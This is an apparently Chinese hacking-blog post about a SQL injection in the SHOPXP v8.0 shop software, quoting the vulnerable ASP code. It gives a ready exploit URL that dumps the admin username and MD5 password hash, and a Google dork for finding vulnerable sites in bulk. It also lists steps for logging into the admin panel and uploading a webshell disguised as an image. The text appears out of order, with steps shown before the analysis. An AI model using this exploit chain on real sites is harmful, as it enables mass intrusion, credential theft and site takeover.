SHOPXP网上购物系统 v8.0

2010, February 24, 9:12 PM. 漏洞分析
Submitted by admin

注意:用户名和密码是连在一起的,后十六位是密码MD5加密  adminb1481eca94b12f75 =====admin  b1481eca94b12f75(38983806 )
第三步:登陆后台:/admin  或者/admin_shopxp
第四步:把小马改为图片格式后缀准备上传
-帕瓦]

    
商城系统差不多都是互相抄的。漏洞和网趣的那个一样,不过人家加了一个枫叶的防注入,没什么用处。
在TEXTBOX2.ASP TEXTBOX3.ASP页面的newsid变量为判断
Action=LCase(Request.QueryString("Action")) 
newsID=Request.QueryString("newsID")
If request("action")="modify" Then 
set rs=server.createobject("adodb.recordset") 
sql="select * from shopxp_news where newsid="&newsid 
rs.open sql,conn,1,1 
     If Not rs.Eof Then 
         Content=rs("newscontent") 
     End If 
     Response.Write Content 
End If 
构造URL注入即可。
exp:

http://www.xx.com/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201

,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
批量
google:inurl:shopxp_news.asp 

Tags: shopxp

« 上一篇 | 下一篇 »

只显示10条记录相关文章
shopxp html版2.0直接添加管理员漏洞 (浏览: 11048, 评论: 0)
shopxp pinglun.asp 注入漏洞 (浏览: 10918, 评论: 0)
ShopXp CMS上传拿Webshell (浏览: 10580, 评论: 0)
SHOPXP网上购物系统 v8.0 注入漏洞利用 (浏览: 10405, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11594, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):